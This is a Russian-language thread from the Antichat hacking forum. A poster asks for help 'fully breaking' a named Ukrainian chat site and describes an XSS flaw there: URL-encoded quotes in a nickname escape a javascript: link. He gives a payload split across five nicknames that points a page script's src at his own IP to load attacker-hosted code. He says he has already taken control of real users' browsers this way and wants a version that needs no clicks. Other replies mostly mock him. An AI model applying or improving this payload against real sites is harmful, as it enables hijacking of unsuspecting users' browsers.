Форум АНТИЧАТ - Помогите доломать чат!!!!!!!!!!!!

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)

- - Помогите доломать чат!!!!!!!!!!!! (https://forum.antichat.xyz/showthread.php?t=17894)

Помогите доломать чат!!!!!!!!!!!!

Помогите пожалуйста ломануть чат
http://www.chatinet.zp.ua по полной програме

Я нашёл там одну XSS пробоину Но уж больно
непросто заманить юзера

Вкратце опишу дыру может Кому интерестно будет
Есле залогинетесь под поролем Rendom то после того как вы напишете комуто сообщение в броузере появится такой код
.........<a href="Javascript: parent.send.WritePage('52656E646F6D','Rendom')"><f ont color="#006688">Rendom...............</a>

Ловите фишку ник передаётся как параметр в фунцию всёбы не чего НО всё ето происходит в
hrefe а ето значит что опасные знаки типа ' " можна прописывать в %27 и %22 обходя все фильтры
Теперь введя ник %27,alert(),%27 (%27 значит ')
получим:
....<a href="Javascript: parent.send.WritePage('52656E646F6D','%27,alert(), %27')">%27,alert(),%27
...............</a>

И при клике по нашему нику выполнится код между запятыми !!!!!!! УРА!!!!!!!!
Используя Apach и детскую наивность чатлан мне удалось закачать Script к ним в броузер и захватить полный кантроль Всё бы то ничего но для того чтобы закачать Script нужно заставить одного юзера нажать на пять карявых ников Что не всегда удается

Может поможите ломануть по полной програме
чтоб послал сообщение и всё и чтоб не упрашивать юзера кликать пять раз по карявым никам

Ну очень надо !!!!!!!!!
Зарание блогаларен.

ничерта не понял. то под паролем Рандом логиниться надо, то ник передается.
А Апач зачем?

Регься липовой регистрацией и оставь данные для входа. Народ посмотрит сам.

Под Rendom надо понимать любой ник
А Apach для того чтобы залить свой Script к чатлану ну тоесь у кокого нибудь скрипта
изменить значение атрибута SRC="мой IP"
Я же писал что вся загвоздка состоит в том чтобы заставить юзера последовательно кликнуть на пять вычурных ников Тем самым в его броузере выполнится код в результате у какого нибудь Scripta изменится атрибуд SRC на мой IP !

Все равно не понял.
Ну выйдешь ты за пределы ником типа 123', но толку то? Работает фильтр, длинное обрезается. Как ты путь (scr) скрипту свой прописал? Нафиг Апач?

я тоже так и не пойму о чём автор говорит.

Автор, лучше бы ты писал больше запятых, чем воскл. знаков.. Прочитать +понять смысл НЕРЕАЛЬНО

По-русски все опиши, особенно вот этот момент:

Цитата:

Используя Apach и детскую наивность чатлан мне удалось закачать Script к ним в броузер и захватить полный кантроль Всё бы то ничего но для того чтобы закачать Script нужно заставить одного юзера нажать на пять карявых ников Что не всегда удается

...

Ребята ну надоже хоть немного мозгами пораскинуть
ну что вы хотите чтоб я всё разжевал ???

Отвечаю на вопросы censored!

Да фильтр режет ник Но.............
поетому нужно разбить весь код по изменению SRC на пять ников
d=document
s=d.scripts[0]
p="http:\\"
p=p+"my_IP"
s.src=p
User Последовательно кликая по никам выполнит код .
А ники корявые потаму что там полавину символов заминить на %коды надо.
Ну а если ты ешё не понял зачем Apach то мой тебе совет Выпей Яду!

Автор гонит не по-детски и, по-моему, не особо шарит по теме - видимо кто-то ему что-то сказал про сайт, а он это со слов записать попытался.

Блин народ ну что ещё не понятного????
Спрашуйте...............